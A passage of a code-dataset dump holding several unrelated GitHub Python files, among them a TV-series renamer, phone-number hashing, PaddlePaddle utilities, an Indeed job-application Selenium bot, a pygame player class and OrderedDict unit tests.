re.compile(r'(\\W+)').sub(' ', match[1]).strip()\n prefix_counter[series_name] += 1\n season_and_episode = match[2].lower()\n extension = match.groups()[-1][1:]\n suggestion = \"{}.{}\".format(season_and_episode, extension)\n suggestions[filename] = suggestion\n else:\n print(\"[WARN] File name does not match renaming pattern: {}\".format(filename))\n\n common_prefixes = [x[0] for x in prefix_counter.most_common(3)]\n return common_prefixes, suggestions\n\n\ndef rename_files(dir_path: str, prefix: str, suggestions: Dict[str, str]):\n print(\"Renaming...\")\n for old_filename, suggestion in suggestions.items():\n old_path = os.path.abspath(\"{}/{}\".format(dir_path, old_filename))\n new_path = os.path.abspath(\"{}/{}\".format(dir_path, \"{} {}\".format(prefix, suggestion)))\n os.rename(old_path, new_path)\n print(\"Done!\")\n\n\ndef main():\n args = parse_args()\n (dir_path, _, file_names) = next(os.walk(args.path))\n\n common_prefixes, suggestions = create_suggestions(file_names)\n\n if len(common_prefixes) > 1:\n print(\"Common prefixes:\")\n for p in common_prefixes:\n print(p)\n\n most_common_prefix = common_prefixes[0]\n\n input_prefix = input('Enter prefix (empty for \"{}\"): '.format(most_common_prefix)).strip()\n prefix = most_common_prefix if input_prefix == '' else input_prefix\n\n print('Rename suggestions:')\n for old_filename, suggestion in suggestions.items():\n print(\"{} -> {}\".format(old_filename, \"{} {}\".format(prefix, suggestion)))\n\n if args.info:\n return\n\n answer = input(\"Press y for continue: \").lower().strip()\n if answer != 'y':\n print(\"Сanceled.\")\n return\n\n rename_files(dir_path, prefix, suggestions)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"winogradoff/tv-series-renamer","sub_path":"tv-series-renamer.py","file_name":"tv-series-renamer.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16467201874","text":"# -*- coding: utf-8 -*-\nimport time\nimport hashlib\nimport traceback\nimport pandas as pd\n\n# 配置\nmapping = {\n \"cy\": [(1, 7), (4, 5)], # 餐饮(测试)\n # \"cy\": [(1, 187432), (4, 220703)], # 餐饮\n \"cs\": [(2, 48732), (5, 22389), (7, 72084), (8, -1)], # 催收\n \"ys\": [(3, 193302), (6, -1)] # 疑似催收\n}\n\n\ndef format_tel(tel):\n if isinstance(tel, str):\n return ''.join(i for i in tel if i.isdigit())\n else:\n return None\n\n\ndef phone_encode(string, method=\"md5_sha1\"):\n try:\n if not string:\n return None\n if 'md5' in method:\n m = hashlib.md5()\n m.update(string.encode(encoding='utf-8'))\n string = m.hexdigest()\n string = string[0:32]\n if 'sha1' in method:\n s = hashlib.sha1()\n s.update(string.encode(encoding='utf-8').upper())\n string = s.hexdigest().upper()\n return string\n except:\n print(traceback.format_exc())\n return None\n\n\ndef cuishou_db_typed(cuishou_file, canyin_file, new_cuishou_db_file):\n try:\n cuishou = pd.read_csv(cuishou_file, header=None, names=['tel', 'type'])\n cs = cuishou[cuishou.type == 1].reset_index(drop=True)\n ys = cuishou[cuishou.type == 2].reset_index(drop=True)\n cy = pd.read_csv(canyin_file, header=None, names=['tel'], dtype=str)\n cy['tel'] = cy.tel.map(format_tel).map(phone_encode)\n cy = cy.dropna().reset_index(drop=True)\n cy['type'] = pd.Series([], dtype=object)\n for types, item in mapping.items():\n tmp = 0\n for k, v in item:\n if v != -1:\n eval(types).loc[tmp: tmp + v - 1, 'type'] = int(k)\n else:\n eval(types).loc[tmp:, 'type'] = int(k)\n tmp += v\n cy = cy.dropna()\n df = cy.append(cs).append(ys)\n df.sort_values('type').to_csv('new_cuishou_db', index=False, header=False)\n return df\n except:\n print(traceback.format_exc())\n return None\n\n\ndef main():\n st = time.time()\n df = cuishou_db_typed('cuishou_db', 'canyin.tel', 'new_cuishou_db')\n print(time.time() - st)\n print(df.groupby('type').count())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HsuChihwei/Hupyter","sub_path":"work/canyin.py","file_name":"canyin.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40363190106","text":"import contextlib\nimport functools\nimport os\nfrom absl import logging\nimport paddle as pd\nimport numpy as np\nimport math\ndef activation_fn(features, act_fn):\n \"\"\"Customized non-linear activation type.\"\"\"\n if act_fn in ('silu', 'swish'):\n return pd.nn.functional.swish(features)\n elif act_fn == 'silu_native':\n return features * pd.nn.functional.sigmoid(features)\n elif act_fn == 'hswish':\n return features * pd.nn.functional.relu6(features + 3) / 6\n elif act_fn == 'relu':\n return pd.nn.functional.relu(features)\n elif act_fn == 'relu6':\n return pd.nn.functional.relu6(features)\n elif act_fn == 'elu':\n return pd.nn.functional.elu(features)\n elif act_fn == 'leaky_relu':\n return pd.nn.functional.leaky_relu(features)\n elif act_fn == 'selu':\n return pd.nn.functional.selu(features)\n elif act_fn == 'mish': \n return features * pd.tanh(pd.nn.functional.softplus(features))\n else:\n raise ValueError('Unsupported act_fn {}'.format(act_fn))\n\ndef get_act_fn(act_fn):\n if not act_fn:\n return pd.nn.functional.silu\n if isinstance(act_fn, str):\n return functools.partial(activation_fn, act_fn=act_fn)\n return act_fn\n\ndef build_optimizer(learning_rate,\n optimizer_name='rmsprop',\n decay=0.9,\n epsilon=0.001,\n momentum=0.9):\n \"\"\"Build optimizer.\"\"\"\n if optimizer_name == 'sgd':\n logging.info('Using SGD optimizer')\n optimizer = pd.optimizer.SGD(learning_rate=learning_rate)\n elif optimizer_name == 'momentum':\n logging.info('Using Momentum optimizer')\n optimizer = pd.optimizer.Momentum(learning_rate=learning_rate, momentum=momentum)\n elif optimizer_name == 'rmsprop':\n logging.info('Using RMSProp optimizer')\n optimizer = pd.optimizer.RMSProp(learning_rate=learning_rate, weight_decay=decay, momentum=momentum, epsilon=epsilon)\n elif optimizer_name == 'adam':\n logging.info('Using Adam optimizer')\n optimizer = pd.optimizer.Adam(learning_rate)\n else:\n logging.fatal('Unknown optimizer: %s', optimizer_name)\n\n return optimizer\n\ndef normalization(norm_type: str,\n axis=-1,\n epsilon=0.001,\n momentum=0.99,\n groups=8,\n name=None):\n \"\"\"Normalization after conv layers.\"\"\"\n if norm_type == 'gn':\n return pd.nn.GroupNorm(num_groups=groups, num_channels=axis, epsilon=epsilon)\n else:\n return pd.nn.BatchNorm(num_channels=axis, momentum=momentum, epsilon=epsilon)\n\ndef drop_connect(inputs, is_training, survival_prob):\n \"\"\"Drop the entire conv with given survival probability.\"\"\"\n # \"Deep Networks with Stochastic Depth\", https://arxiv.org/pdf/1603.09382.pdf\n if not is_training:\n return inputs\n\n # Compute tensor.\n batch_size = pd.shape(inputs)[0]\n random_tensor = survival_prob\n random_tensor += pd.uniform([batch_size, 1, 1, 1], dtype=inputs.dtype)\n binary_tensor = pd.floor(random_tensor)\n # Unlike conventional way that multiply survival_prob at test time, here we\n # divide survival_prob at training time, such that no addition compute is\n # needed at test time.\n output = inputs / survival_prob * binary_tensor\n return output\n\n\nclass Pair(tuple):\n\n def __new__(cls, name, value):\n return super().__new__(cls, (name, value))\n\n def __init__(self, name, _): # pylint: disable=super-init-not-called\n self.name = name\n\n@contextlib.contextmanager\ndef float16_scope():\n \"\"\"Scope class for float16.\"\"\"\n\n def _custom_getter(getter, *args, **kwargs):\n \"\"\"Returns a custom getter that methods must be called under.\"\"\"\n cast_to_float16 = False\n requested_dtype = kwargs['dtype']\n if requested_dtype == pd.float16:\n kwargs['dtype'] = pd.float32\n cast_to_float16 = True\n var = getter(*args, **kwargs)\n if cast_to_float16:\n var = pd.cast(var, pd.float16)\n return var\n\ndef round_filters(filters, mconfig, skip=False):\n \"\"\"Round number of filters based on depth multiplier.\"\"\"\n multiplier = mconfig.width_coefficient\n divisor = mconfig.depth_divisor\n min_depth = mconfig.min_depth\n if skip or not multiplier:\n return filters\n filters *= multiplier\n min_depth = min_depth or divisor\n new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)\n if new_filters < 0.9 * filters: # prevent rounding by more than 10%\n new_filters += divisor\n return int(new_filters)\n\n\ndef round_repeats(repeats, multiplier, skip=False):\n \"\"\"Round number of filters based on depth multiplier.\"\"\"\n if skip or not multiplier:\n return repeats\n return int(math.ceil(multiplier * repeats))\n\ndef cal_padding(img_size, stride, filter_size, dilation=1):\n \"\"\"Calculate padding size.\"\"\"\n if img_size % stride == 0:\n out_size = max(filter_size - stride, 0)\n else:\n out_size = max(filter_size - (img_size % stride), 0)\n return out_size // 2, out_size - out_size // 2\n\ndef conv_kernel_initializer(shape, dtype=None, partition_info=None):\n \"\"\"定义卷积核初始化.\n 调用paddle.normal生成符合正态分布的随机Tensor\n \"\"\"\n del partition_info\n kernel_height, kernel_width, _, out_filters = shape\n fan_out = int(kernel_height * kernel_width * out_filters)\n return pd.normal(\n shape=shape, mean=0.0, std=np.sqrt(2.0 / fan_out), dtype=dtype)\n\n\ndef dense_kernel_initializer(shape, dtype=None, partition_info=None):\n \"\"\"稠密dense层初始化\n 调用paddle.uniform实现均匀分布\n \"\"\"\n del partition_info\n init_range = 1.0 / np.sqrt(shape[1])\n return pd.uniform(shape, min=-init_range, max=init_range, dtype=dtype)","repo_name":"Stave604671/paddlepaddle_efficientnetv2","sub_path":"tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12633435401","text":"# -*- coding: utf-8 -*-\n\nimport geatpy as ea\nimport numpy as np\n\n\"\"\"\n\n本案例展示了如何快速创建问题对象、快速调用算法求解一个含两个约束的单目标优化问题。\n跟soea_quick_start_aimFunc案例不同的是,本案例通过装饰器single标记目标函数aimFunc,使得它传入的种群对象只有单个个体。\n\n\"\"\"\n\nif __name__ == '__main__':\n # 构建问题\n r = 1 # 模拟该案例问题计算目标函数时需要用到的额外数据\n @ea.Problem.single\n def aimFunc(pop): # 定义目标函数(含约束)\n Vars = pop.Phen\n pop.ObjV = np.sum((Vars - r) ** 2, 1, keepdims=True) # 计算目标函数值,赋值给种群对象的ObjV属性\n x1 = Vars[:, [0]] # 把Vars的第0列取出来\n x2 = Vars[:, [1]] # 把Vars的第1列取出来\n pop.CV = np.hstack([(x1 - 0.5) ** 2 - 0.25,\n (x2 - 1) ** 2 - 1]) # 计算违反约束程度值,赋值给种群对象的CV属性\n\n problem = ea.Problem(name='soea quick start demo',\n M=1, # 目标维数\n maxormins=[1], # 目标最小最大化标记列表,1:最小化该目标;-1:最大化该目标\n Dim=5, # 决策变量维数\n varTypes=[0, 0, 1, 1, 1], # 决策变量的类型列表,0:实数;1:整数\n lb=[-1, 1, 2, 1, 0], # 决策变量下界\n ub=[1, 4, 5, 2, 1], # 决策变量上界\n aimFunc=aimFunc)\n # 构建算法\n algorithm = ea.soea_SEGA_templet(problem,\n ea.Population(Encoding='RI', NIND=20),\n MAXGEN=50, # 最大进化代数。\n logTras=1, # 表示每隔多少代记录一次日志信息,0表示不记录。\n trappedValue=1e-6, # 单目标优化陷入停滞的判断阈值。\n maxTrappedCount=10) # 进化停滞计数器最大上限值。\n # 求解\n res = ea.optimize(algorithm, verbose=True, drawing=1, outputMsg=True, drawLog=False, saveFlag=True)\n print(res)\n","repo_name":"0x886c/geatpy","sub_path":"geatpy/demo/soea_demo/soea_quick_start_aimFunc_single/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"74856983812","text":"from jinja2 import Undefined\nfrom psutil import users\nfrom selenium import webdriver\nimport random\nimport time\nimport os\nimport pytools # note: pytools is my own python library, to use it, download it here: https://github.com/Ghostcrafter090/pytools\nimport sys as sysn\n\n# Globals\nclass globals:\n broswer = '' # allows access to browser driver at all levels of application\n user = \"\"\n passwd = \"\"\n questions = {}\n\n# Sys class, contains main components\nclass sys:\n def start():\n globals.browser = webdriver.Firefox()\n\n # Used for signing in, requires user interaction in the form of verification and recapcha\n def signin(username, password):\n globals.browser.get(\"https://secure.indeed.com/auth?hl=en_CA&co=CA&continue=https%3A%2F%2Fca.indeed.com%2Fcmp%2FLeap-Tools-Inc.-1%2Fjobs%3Fjk%3D562c7031db35aae8%26start%3D0%26clearPrefilter%3D1&tmpl=desktop&from=gnav-util-acme--acme-webapp&_ga=2.205514322.358284476.1651172242-1342485949.1651172242\")\n time.sleep(1)\n\n # contains primary functions of the bot, main actions used based on criteria are stored here.\n class funcs:\n def apply(jobf):\n sys.exe.goto(jobf.get_attribute('href'))\n time.sleep(3)\n try:\n test = globals.browser.find_element_by_css_selector(\"button[id=indeedApplyButton]\").get_attribute(\"innerText\") != \"Apply Now ✓\"\n except:\n test = True\n print(test)\n try:\n if test == True:\n globals.browser.find_elements_by_css_selector(\"button[id=indeedApplyButton]\")[0].click()\n time.sleep(3)\n out = 1\n fnl = 0\n while (out != 0) and (fnl < 100):\n try:\n out = pageAction()\n except:\n print(\"Unexpected apply error:\", sysn.exc_info())\n fnl = fnl + 1\n return 1\n except:\n pass\n return 0\n\n class questions:\n def checkQuestions(question):\n answer = input(\"Answer (yes/*) ? \")\n confirm = False\n while confirm == False:\n if answer == \"yes\":\n final = input(\"Response: \")\n globals.questions[question] = final\n else:\n globals.questions[question] = \"?ask\"\n sure = input(\"Are you sure (yes/*) ? \")\n if sure == \"yes\":\n confirm = True\n print(globals.questions)\n pytools.IO.saveJson(\"questions.json\", globals.questions)\n\n # https://ca.indeed.com/jobs?q=Junior%20Developer&l=Canada&lang=en&taxo1=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11&vjk=89a07d50778ecdc7\n\n def answerQuestions():\n globals.questions = pytools.IO.getJson(\"questions.json\")\n yes = True\n n = 0\n while yes:\n try:\n noError = False\n quest = globals.browser.find_element_by_css_selector('div[id=q_' + str(n) + ']')\n try:\n box = quest.find_elements_by_css_selector('[id=' + quest.find_elements_by_css_selector('label')[0].get_attribute('for') + ']')[0]\n noError = True\n except:\n tools.pause()\n if noError:\n boxType = \"new\"\n if box.tag_name == \"textarea\":\n boxType = \"textarea\"\n elif box.tag_name == \"select\":\n boxType = \"select\"\n elif box.tag_name == \"input\":\n if box.get_attribute('type') == \"number\":\n boxType = \"input-number\"\n if box.get_attribute('type') == \"text\":\n boxType = \"input-text\"\n if box.get_attribute('type') == \"date\":\n boxType = \"input-date\"\n if box.get_attribute('type') == \"tel\":\n boxType = \"input-tel\"\n elif box.tag_name == \"fieldset\":\n boxType = \"fieldset\"\n quest = globals.browser.find_element_by_css_selector('div[id=q_' + str(n) + ']')\n try:\n tools.dummy(globals.questions[quest.get_attribute('innerText') + \"_\" + boxType])\n except:\n print(quest.get_attribute('innerText') + \"_\" + boxType)\n sys.funcs.questions.checkQuestions(quest.get_attribute('innerText') + \"_\" + boxType)\n if globals.questions[quest.get_attribute('innerText') + \"_\" + boxType] == \"?ask\":\n confirm = False\n while confirm == False:\n answer = input(\"Response: \")\n check = input(\"Are you sure (yes/*) ? \")\n if check == \"yes\":\n confirm = True\n else:\n answer = globals.questions[quest.get_attribute('innerText') + \"_\" + boxType]\n quest.find_elements_by_css_selector('[id=' + quest.find_elements_by_css_selector('label')[0].get_attribute('for') + ']')[0]\n box = quest.find_elements_by_css_selector('[id=' + quest.find_elements_by_css_selector('label')[0].get_attribute('for') + ']')[0]\n if box.tag_name == \"textarea\":\n box.clear()\n for letter in answer:\n print(letter)\n box.send_keys(letter)\n wait_time = random.randint(0, 500) / 10000\n time.sleep(wait_time)\n elif box.tag_name == \"select\":\n box.find_elements_by_css_selector('option')[int(answer)].click()\n elif box.tag_name == \"input\":\n box.clear()\n if box.get_attribute('type') == \"number\":\n for letter in answer:\n print(letter)\n box.send_keys(letter)\n wait_time = random.randint(0, 500) / 10000\n time.sleep(wait_time)\n if box.get_attribute('type') == \"text\":\n for letter in answer:\n print(letter)\n box.send_keys(letter)\n wait_time = random.randint(0, 500) / 10000\n time.sleep(wait_time)\n if box.get_attribute('type') == \"date\":\n if answer == \"today\":\n globals.browser.execute_script('document.getElementById(\"' + box.get_attribute('id') + '\").valueAsDate = new Date()')\n else:\n dateArray = pytools.clock.getDateTime()\n globals.browser.execute_script('document.getElementById(\"' + box.get_attribute('id') + '\").valueAsDate = new Date(\"' + answer.split(\"-\")[0] + '-' + answer.split(\"-\")[1] + '-' + answer.split(\"-\")[2] + '\")')\n tools.pause()\n if box.get_attribute('type') == \"tel\":\n for letter in answer:\n print(letter)\n box.send_keys(letter)\n wait_time = random.randint(0, 500) / 10000\n time.sleep(wait_time)\n elif box.tag_name == \"fieldset\":\n quest.find_elements_by_css_selector('label[for=' + quest.find_elements_by_css_selector('label')[0].get_attribute('for') + '-' + str(answer) + ']')[0].click()\n elif box.tag_name == 'div':\n box.find_elements_by_css_selector('label[for=' + box.find_elements_by_css_selector('input')[int(answer)].get_attribute('id') + ']')[0].find_elements_by_css_selector('span')[0].click()\n except:\n print(\"Unexpected error:\", sysn.exc_info())\n yes = False\n n = n + 1\n globals.browser.find_elements_by_css_selector(\"div[class=ia-pageButtonGroup]\")[0].find_elements_by_css_selector(\"button\")[1].click()\n \n def forward():\n globals.browser.find_elements_by_css_selector(\"div[class=ia-pageButtonGroup]\")[0].find_elements_by_css_selector(\"button\")[1].click()\n\n def jobExpo():\n globals.browser.find_elements_by_css_selector('div[role=radio]')[0].click()\n globals.browser.find_elements_by_css_selector(\"div[class=ia-pageButtonGroup]\")[0].find_elements_by_css_selector(\"button\")[1].click()\n\n def coverLetter(f):\n globals.browser.find_elements_by_css_selector(\"div[id=write-cover-letter-selection-card]\")[f].click()\n time.sleep(1)\n text = pytools.IO.getFile('message.txt')\n text_input = globals.browser.find_element_by_css_selector('textarea[id=coverletter-textarea]')\n text_input.clear()\n for letter in text:\n print(letter)\n text_input.send_keys(letter)\n wait_time = random.randint(0, 500) / 10000\n time.sleep(wait_time)\n time.sleep(1)\n globals.browser.find_elements_by_css_selector(\"div[class=ia-pageButtonGroup]\")[0].find_elements_by_css_selector(\"button\")[1].click()\n \n def addResume():\n globals.browser.find_elements_by_css_selector('div[id=ia-IndeedResumeSelect-headerButton]')[0].click()\n globals.browser.find_elements_by_css_selector(\"div[class=ia-pageButtonGroup]\")[0].find_elements_by_css_selector(\"button\")[1].click()\n\n def yesImSmart():\n globals.browser.find_elements_by_css_selector('div[class=ia-InterventionActionButtons]')[0].find_elements_by_css_selector('button')[0].click()\n \n\n # small functions for making my life easier\n class exe:\n def goto(url):\n globals.browser.get(url)\n\n# more general tools\nclass tools:\n def pause():\n os.system(\"pause\")\n\n def dummy(inf):\n return inf == inf\n\n# Main function\ndef main():\n\n nameCrit = {\n \"containsOr\": [\n \"Develop\",\n \"Programmer\",\n \"Software\"\n \"Java \"\n ],\n \"containsAnd\": [],\n \"!contains\": [\n \"Senior\",\n \"Sales\",\n \"Analytics\"\n ]\n }\n\n try:\n print(\"Username: \" + sysn.argv[1])\n globals.user = sysn.argv[1]\n globals.passwd = sysn.argv[2]\n except:\n pass\n sys.start()\n sys.signin(globals.user, globals.passwd)\n tools.pause()\n sys.exe.goto(\"https://ca.indeed.com/jobs?q=Developer&l=Canada&jt=fulltime&sort=date&fromage=7&lang=en&taxo2=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11\")\n while True:\n add = 0\n i = 0\n while i < len(globals.browser.find_elements_by_css_selector(\"a\")):\n print(i)\n sys.exe.goto(\"https://ca.indeed.com/jobs?q=Developer&l=Canada&jt=fulltime&sort=date&fromage=7&lang=en&taxo2=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11\")\n time.sleep(3)\n app = 0\n while app != 1:\n fn = True\n while fn and (i < len(globals.browser.find_elements_by_css_selector(\"a\"))):\n print(i)\n try:\n jobf = globals.browser.find_elements_by_css_selector(\"a\")[i]\n job = jobf.find_elements_by_css_selector(\"td[class=resultContent]\")[0]\n fn = False\n except:\n pass\n i = i + 1\n containsAnd = True\n containsOr = False\n notContains = True\n try:\n print(job.find_elements_by_css_selector(\"h2\")[0].get_attribute(\"innerText\"))\n try:\n for crit in nameCrit[\"containsAnd\"]:\n if job.find_elements_by_css_selector(\"h2\")[0].get_attribute(\"innerText\").find(crit) == -1:\n containsAnd = False\n except:\n pass\n for crit in nameCrit[\"containsOr\"]:\n if job.find_elements_by_css_selector(\"h2\")[0].get_attribute(\"innerText\").find(crit) != -1:\n containsOr = True\n for crit in nameCrit[\"!contains\"]:\n if job.find_elements_by_css_selector(\"h2\")[0].get_attribute(\"innerText\").find(crit) != -1:\n notContains = False\n print(\"contains requirements: \" + str(containsAnd))\n print(\"contains one opt requirement: \" + str(containsOr))\n print(\"doesn't contain blacklist requirements: \" + str(notContains))\n add = add + 1\n if (containsAnd) and (containsOr) and (notContains):\n app = sys.funcs.apply(jobf)\n add = 0\n sys.exe.goto(\"https://ca.indeed.com/jobs?q=Developer&l=Canada&jt=fulltime&sort=date&fromage=7&lang=en&taxo2=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11\")\n time.sleep(3)\n if add > 100:\n i = 0\n add = 0\n sys.exe.goto(\"https://ca.indeed.com/jobs?q=Developer&l=Canada&jt=fulltime&sort=date&fromage=7&lang=en&taxo2=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11\")\n time.sleep(3)\n except:\n print(\"Unexpected main error:\", sysn.exc_info())\n sys.exe.goto(\"https://ca.indeed.com/jobs?q=Developer&l=Canada&jt=fulltime&sort=date&fromage=7&lang=en&taxo2=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11\")\n time.sleep(3)\n i = i + 1\n\ndef pageAction():\n h1 = globals.browser.find_element_by_css_selector('h1').get_attribute('innerText')\n out = 0\n if h1 == 'Add a resume for the employer':\n sys.funcs.questions.forward()\n out = 1\n elif h1 == 'Select a past job that shows relevant experience':\n sys.funcs.questions.jobExpo()\n out = 2\n elif h1 == 'Consider adding supporting documents':\n try:\n sys.funcs.questions.coverLetter(0)\n except:\n sys.funcs.questions.coverLetter(1)\n out = 3\n elif h1.find('Questions from') != -1:\n sys.funcs.questions.answerQuestions()\n out = 4\n elif h1 == 'Please review your application':\n sys.funcs.questions.forward()\n out = 5\n elif h1.find('Add a resume') != -1:\n sys.funcs.questions.addResume()\n out = 6\n elif h1.find('Do you have these qualifications') != -1:\n sys.funcs.questions.yesImSmart()\n out = 7\n elif h1.find('Want to include any supporting documents?'):\n try:\n sys.funcs.questions.coverLetter(1)\n except:\n sys.funcs.questions.coverLetter(0)\n out = 8\n return out\n\n","repo_name":"Ghostcrafter090/Indeed-Application-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16691472559","text":"# Design a program that uses a while loop and continuously asks the user to \n# enter a word unless the user enters \"chupacabra\" as the secret exit word, in which case \n# the message \"You've successfully left the loop.\" should be printed to the screen, \n# and the loop should terminate.\n\nsecret_word = \"chupacabra\"\nword = input(\"Enter the secret word!: \")\n\nwhile True:\n if word == secret_word:\n break\n word = input(\"Wrong word muggle, gess again!\")\nprint(\"Lucky muggle! You've successfully left the loop.\")","repo_name":"chimezdev/python-projects","sub_path":"loops/guess_secret_word.py","file_name":"guess_secret_word.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3422081849","text":"\nimport pygame\nimport settings\nimport math\n\nfrom pygame.locals import (\n K_UP,\n K_DOWN,\n K_LEFT,\n K_RIGHT,\n K_ESCAPE,\n K_SPACE,\n KEYDOWN,\n K_RETURN,\n K_F4,\n QUIT\n)\n\n\nclass Player():\n\n def __init__(self, startposition, color, size, delay, settings, enemylist, spawnRadius, highscore):\n self.screen = settings.screen\n self.settings = settings\n self.color = color\n self.size = size\n self.delay = delay\n self.playerMoveCounter = 0\n self.counter = 0\n self.playerPos = pygame.Vector2(startposition[0], startposition[1])\n self.EnemyList = enemylist\n self.SpawnRadius = spawnRadius\n self.Ability = False\n self.Ability_activationTime = 600\n self.Ability_counter = 0\n self.Ability_costs = 0.90 # 10%\n self.highscore = highscore\n self.abilitytext = \"\"\n\n def move(self):\n keys = pygame.key.get_pressed()\n if keys[K_LEFT] or keys[pygame.K_a]:\n if self.playerPos.x > 0:\n self.playerPos.x -= 1\n if not keys[K_RIGHT]:\n self.counter += 1\n\n if keys[K_RIGHT] or keys[pygame.K_d]:\n if self.playerPos.x < self.settings.width - self.settings.defaultSize:\n self.playerPos.x += 1\n if not keys[K_LEFT]:\n self.counter += 1\n\n if keys[K_UP] or keys[pygame.K_w]:\n if self.playerPos.y > 0:\n self.playerPos.y -= 1\n if not keys[K_DOWN]:\n self.counter += 1\n\n if keys[K_DOWN] or keys[pygame.K_s]:\n if self.playerPos.y < self.settings.height-self.settings.defaultSize:\n self.playerPos.y += 1\n if not keys[K_UP]:\n self.counter += 1\n if keys[K_SPACE]:\n if self.Ability == False and self.Ability_counter == -1:\n self.Ability = True\n self.Ability_counter = 0\n self.highscore.PlayerHighscore = math.floor(\n self.highscore.PlayerHighscore * self.Ability_costs)\n#################### tick every 0.0001 s #####################\n\n def tick(self, _clocktime):\n self.playerMoveCounter += _clocktime\n self.player_draw()\n\n if self.playerMoveCounter >= self.delay:\n ###################### Update Highscore ##################\n if self.Ability == False:\n self.highscore.PlayerHighscore += len(self.EnemyList)\n\n ###################### ABILITY CHECK #####################\n if self.Ability == True:\n self.Ability_counter += 1\n if self.Ability_counter >= self.Ability_activationTime:\n self.Ability = False\n elif self.Ability_counter <= 1000 and self.Ability_counter > 0: #### 1000 cooldown\n self.Ability_counter += 1\n else:\n self.Ability_counter = -1\n\n ###################### MOVE and counter set 0 ############\n self.playerMoveCounter = 0\n self.move()\n\n################ DRAW PLAYER ####################\n def player_draw(self):\n pygame.draw.rect(self.screen, self.color, (self.playerPos.x,\n self.playerPos.y, self.size, self.size))\n def ability_string(self):\n if self.Ability:\n self.abilitytext = \" FREEZE ACTIVATED\"\n elif not self.Ability and self.Ability_counter >=1:\n self.abilitytext = \"COOLDOWN: {0}\".format((1000 - self.Ability_counter)/100)\n \n else:\n self.abilitytext = \" Freeze Ready - press SPACE - Costs: 10% Highscore\"\n return self.abilitytext","repo_name":"chocolandTV/dodgeblock","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71432039172","text":"# Name: test_ordered_dict.py\n# Since: April 13th, 2020\n# Author: Christen Ford\n# Purpose: Performs unit testing on the simplejson.ordered_dict\n#\tmodule.\n\nfrom unittest import TestCase\n\nimport simplejson.ordered_dict as ordered_dict\n\n\nclass TestOrderedDict(TestCase):\n \"\"\"Implements unit tests on the simplejson.ordered_dict\n module. The tests performed by this module make sane\n attempts at being as thorough as possible, but they are\n not exhaustive.\n \"\"\"\n\n std_input = dict()\n std_input[\"abc\"] = 0\n std_input[\"def\"] = 1\n std_input[\"ghi\"] = 2\n\n @classmethod\n def get_test_dict(cls):\n return ordered_dict.OrderedDict(TestOrderedDict.std_input)\n\n def test_create(self):\n \"\"\"\n Description: Tests that the OrderedDict:__init__()\n function returns an OrderedDict created from a mapping\n containing the following key-value pairs:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input:\n (mapping): {\"abc\": 0, \"def\": 1, \"ghi\": 2}\n\n Output:\n (OrderedDict): An instance of an OrderedDict\n containing the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Test Case: Corresponds to test case TEST-0068.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n\n # TODO: Test that the od was constructed correctly\n\n def test_clear(self):\n \"\"\"\n Description: Test that the OrderedDict:clear()\n function correctly empties an OrderedDict containing the\n following mappings: {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input: This function accepts no input.\n\n Output: This function produces no output.\n\n Test Case: Corresponds to test case TEST-0069.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n self.assertNotEqual(len(od), 0)\n od.clear()\n self.assertEqual(len(od), 0)\n\n def test_set_item(self):\n \"\"\"\n Description: Tests that the OrderedDict:__setitem__()\n magic method correctly inserts a key-value pair into\n an empty ordered dictionary.\n\n Input:\n (str, int): (\"test-0070\", -1)\n\n Output: This function produces no output.\n\n Test Case: Corresponds to test case TEST-0070.\n \"\"\"\n od = ordered_dict.OrderedDict()\n self.assertNotIn(\"test-0070\", od.keys())\n self.assertNotIn(-1, od.values())\n od[\"test-0070\"] = -1\n self.assertIn(\"test-0070\", od.keys())\n self.assertIn(-1, od.values())\n\n def test_del_item(self):\n \"\"\"\n Description: Tests that the OrderedDict:__delitem__()\n magic method correctly removes a key-value pair from\n an OrderedDict containing the following mappings:\n {\"test-0070\": 0, \"test-0071\": 1, \"test-0072\": 2}.\n\n Input:\n (str): \"test-0070\"\n\n Output: This function produces no output.\n\n Test Case: Corresponds to test case TEST-0071.\n \"\"\"\n od = ordered_dict.OrderedDict()\n od[\"test-0070\"] = -1\n self.assertIn(\"test-0070\", od.keys())\n self.assertIn(-1, od.values())\n del od[\"test-0070\"]\n self.assertNotIn(\"test-0070\", od.keys())\n self.assertNotIn(-1, od.values())\n\n def test_iter(self):\n \"\"\"\n Description: Tests that the OrderedDict:__iter__()\n magic method returns a generator function that yields\n keys from an ordered dictionary containing\n the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input: This function accepts no input.\n\n Output:\n (generator): A generator function that yields\n keys pairs in the following order:\n 0, 1, 2.\n\n Test Case: 